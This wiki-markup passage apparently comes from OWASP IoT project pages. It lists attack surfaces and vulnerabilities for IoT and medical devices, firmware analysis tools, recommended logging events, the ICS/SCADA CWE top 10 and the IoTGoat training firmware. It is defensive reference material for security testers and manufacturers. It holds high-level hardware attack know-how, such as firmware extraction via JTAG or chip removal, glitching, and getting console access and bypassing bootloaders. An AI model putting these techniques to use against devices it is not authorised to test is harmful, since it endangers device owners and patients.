* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]] <br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
